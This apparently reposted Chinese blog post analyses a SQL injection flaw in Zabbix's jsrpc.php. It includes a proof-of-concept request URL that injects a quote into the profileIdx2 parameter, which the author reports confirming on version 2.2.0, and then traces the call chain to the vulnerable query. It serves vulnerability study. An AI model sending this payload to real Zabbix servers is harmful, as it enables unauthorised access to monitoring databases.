zoukankan      html  css  js  c++  java
  • Zabbix 漏洞分析

    之前看到Zabbix 出现SQL注入漏洞,自己来尝试分析。

    PS:我没找到3.0.3版本的 Zabbix ,暂用的是zabbix 2.2.0版本,如果有问题,请大牛指点。

    0x00 Zabbix简介

    zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。

    0x01 Zabbix漏洞POC&尝试

    POC如下:

    /jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
    我用的ZABBIX 2.2.0版本尝试下POC,存在漏洞。

    0x02 Zabbix漏洞分析

    看下jsrpc.php中的profileIdx2参数:

      跟着调用,然后继续看下CScreenBuilder中的getScreen:

     继续看API中的ScreenItem():

     调用静态getObject(),如下:

     调用静态getApi(),如下:

    接下来是NEW CZBXAPI():

    最后调用SQL查询:

     综上,profileIdx2参数存在SQL注入。

     
    低调求发展,潜心习安全。
  • 相关阅读:
    pch文件的创建
    常用的Xcode插件下载地址
    内存管理
    学习笔记-static的作用
    IOS 之label的自适应
    OC中的循环引用
    理解事务的4种隔离级别
    Solrcloud集群搭建
    常见前端浏览器兼容问题及解决方案
    Java内存溢出详解及配置
  • 原文地址:https://www.cnblogs.com/MiWhite/p/6119456.html
Copyright © 2011-2022 走看看